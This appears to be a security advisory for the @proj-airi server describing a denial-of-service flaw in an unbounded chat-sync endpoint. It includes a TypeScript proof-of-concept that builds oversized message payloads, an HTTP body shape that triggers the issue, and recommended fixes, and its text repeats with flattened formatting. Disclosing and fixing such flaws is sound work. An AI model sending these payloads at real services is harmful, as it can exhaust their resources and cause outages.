Summary (one paragraph)
@proj-airi exposes an authenticated endpoint POST /api/chats/sync that accepts a JSON body containing an unbounded messages array with unbounded content strings. The handler parses the full JSON body in memory and then performs per-message database reads/writes inside a transaction. An authenticated attacker can submit an oversized request (or many moderately large requests) to cause high CPU usage, high memory usage, and heavy database load, leading to denial of service (slowdown and/or OOM).
Vulnerability details
Root causes
- No request size limits in schema (
valibot)
- File:
apps/server/src/api/chats.schema.ts
messages: array(ChatSyncMessageSchema) is unbounded.
content: string() is unbounded.
chat.id, chat.title, message.id are unbounded strings too.
- No server-side body size limit / streaming guard
- File:
apps/server/src/routes/chats.ts
- The handler calls
await c.req.json() and then validates, meaning the full payload must be read and parsed before rejection.
- Per-message DB lookup and write in a loop
- File:
apps/server/src/services/chats.ts
- For each message, the service does a
findFirst by message id and then an insert or update.
- This makes processing (O(n)) database operations for (n) messages (and in practice can be worse depending on indexes/IO).
Proof of Concept
PoC A: in-repo script that exercises validation + DB writes
This PoC uses the current schema and the current syncChat implementation with an in-memory Postgres-compatible DB (PGlite) and demonstrates that large message batches cause significant server-side work.
import { performance } from 'node:perf_hooks'
import { createRequire } from 'node:module'
import { PGlite } from '@electric-sql/pglite'
import { vector } from '@electric-sql/pglite/vector'
import { sql } from 'drizzle-orm'
import { drizzle } from 'drizzle-orm/pglite'
import { safeParse } from 'valibot'
import { ChatSyncSchema } from '../api/chats.schema'
import * as chatSchema from '../schemas/chats'
import { createChatService } from '../services/chats'
function formatBytes(bytes: number) {
const units = ['B', 'KB', 'MB', 'GB'] as const
let value = bytes
let unit = 0
while (value >= 1024 && unit < units.length - 1) {
value /= 1024
unit += 1
}
return `${value.toFixed(2)} ${units[unit]}`
}
function makePayload(messageCount: number, contentBytes: number) {
const content = 'A'.repeat(contentBytes)
const createdAt = Date.now()
return {
chat: {
id: 'poc-chat',
type: 'group' as const,
title: 'poc',
createdAt,
updatedAt: createdAt,
},
members: [
{ type: 'character' as const, characterId: 'default' },
],
messages: Array.from({ length: messageCount }, (_, i) => ({
id: `m-${i}`,
role: 'user' as const,
content,
createdAt,
})),
}
}
async function createInMemoryDB(schema: Record<string, any>) {
const require = createRequire(import.meta.url)
// drizzle-kit is CJS; require() avoids ESM interop issues
const { pushSchema } = require('drizzle-kit/api') as typeof import('drizzle-kit/api')
const client = new PGlite({
extensions: { vector },
})
const db = drizzle(client, { schema }) as any
await db.execute(sql`CREATE EXTENSION IF NOT EXISTS vector;`)
const { apply } = await pushSchema(schema, db)
await apply()
return db
}
async function main() {
const messageCount = Number(process.env.MESSAGE_COUNT ?? '5000')
const contentBytes = Number(process.env.CONTENT_BYTES ?? '2048')
const userId = process.env.USER_ID ?? 'poc-user'
console.log(JSON.stringify({ messageCount, contentBytes, totalContentApprox: formatBytes(messageCount * contentBytes) }))
const payload = makePayload(messageCount, contentBytes)
const mem0 = process.memoryUsage().heapUsed
const t0 = performance.now()
const parsed = safeParse(ChatSyncSchema, payload)
const t1 = performance.now()
const mem1 = process.memoryUsage().heapUsed
if (!parsed.success) {
console.error('Schema rejected payload:', parsed.issues)
process.exitCode = 2
return
}
console.log(`safeParse(ChatSyncSchema): ${(t1 - t0).toFixed(1)} ms, heap +${formatBytes(mem1 - mem0)}`)
const db = await createInMemoryDB(chatSchema)
const chatService = createChatService(db)
const t2 = performance.now()
const res = await chatService.syncChat(userId, parsed.output)
const t3 = performance.now()
console.log(`chatService.syncChat: ${(t3 - t2).toFixed(1)} ms, result: ${JSON.stringify(res)}`)
}
// eslint-disable-next-line antfu/no-top-level-await
await main()
Run:
# ~10 MiB total message content (5000 * 2048 bytes)
MESSAGE_COUNT=5000 CONTENT_BYTES=2048 pnpm -C apps/server run apply:env -- tsx src/scripts/poc-chat-sync-dos.ts
# ~20 MiB total message content (20000 * 1024 bytes)
MESSAGE_COUNT=20000 CONTENT_BYTES=1024 pnpm -C apps/server run apply:env -- tsx src/scripts/poc-chat-sync-dos.ts
Observed (representative) results on my machine:
MESSAGE_COUNT=5000, CONTENT_BYTES=2048 → syncChat ~ 2.2s
MESSAGE_COUNT=20000, CONTENT_BYTES=1024 → syncChat ~ 8.4s
In production (real network, JSON parsing overhead, real Postgres IO, concurrent requests) the impact will generally be worse.
PoC B: HTTP request shape (authenticated)
The HTTP body shape that triggers the issue:
{
"chat": { "id": "any-string", "type": "group", "title": "optional", "createdAt": 0, "updatedAt": 0 },
"members": [{ "type": "character", "characterId": "default" }],
"messages": [
{ "id": "m-0", "role": "user", "content": "....very large....", "createdAt": 0 }
]
}
Increasing messages.length and messages[i].content.length increases server work and resource usage.
Recommendations / fixes
- Enforce body size limits at the HTTP layer for
/api/* (or at least /api/chats/sync). If using Hono, add a strict body size limit middleware before c.req.json().
- Add schema bounds in
ChatSyncSchema:
messages: maxSize(...) (e.g., 100–1000 depending on expected use)
content: maxLength(...) (e.g., 10k–100k)
id/title: maxLength(...)
- Avoid per-message
findFirst:
- Use bulk upsert / batch insert.
- Or prefetch existing IDs in a single query, then insert/update in batches.
- Rate limit the endpoint by user/session and/or IP.
- Consider quotas (e.g., max messages per chat per day, max bytes).
Summary (one paragraph)
@proj-airiexposes an authenticated endpointPOST /api/chats/syncthat accepts a JSON body containing an unboundedmessagesarray with unboundedcontentstrings. The handler parses the full JSON body in memory and then performs per-message database reads/writes inside a transaction. An authenticated attacker can submit an oversized request (or many moderately large requests) to cause high CPU usage, high memory usage, and heavy database load, leading to denial of service (slowdown and/or OOM).Vulnerability details
Root causes
valibot)apps/server/src/api/chats.schema.tsmessages: array(ChatSyncMessageSchema)is unbounded.content: string()is unbounded.chat.id,chat.title,message.idare unbounded strings too.apps/server/src/routes/chats.tsawait c.req.json()and then validates, meaning the full payload must be read and parsed before rejection.apps/server/src/services/chats.tsfindFirstby message id and then an insert or update.Proof of Concept
PoC A: in-repo script that exercises validation + DB writes
This PoC uses the current schema and the current
syncChatimplementation with an in-memory Postgres-compatible DB (PGlite) and demonstrates that large message batches cause significant server-side work.Run:
Observed (representative) results on my machine:
MESSAGE_COUNT=5000,CONTENT_BYTES=2048→syncChat~ 2.2sMESSAGE_COUNT=20000,CONTENT_BYTES=1024→syncChat~ 8.4sIn production (real network, JSON parsing overhead, real Postgres IO, concurrent requests) the impact will generally be worse.
PoC B: HTTP request shape (authenticated)
The HTTP body shape that triggers the issue:
{ "chat": { "id": "any-string", "type": "group", "title": "optional", "createdAt": 0, "updatedAt": 0 }, "members": [{ "type": "character", "characterId": "default" }], "messages": [ { "id": "m-0", "role": "user", "content": "....very large....", "createdAt": 0 } ] }Increasing
messages.lengthandmessages[i].content.lengthincreases server work and resource usage.Recommendations / fixes
/api/*(or at least/api/chats/sync). If using Hono, add a strict body size limit middleware beforec.req.json().ChatSyncSchema:messages:maxSize(...)(e.g., 100–1000 depending on expected use)content:maxLength(...)(e.g., 10k–100k)id/title:maxLength(...)findFirst: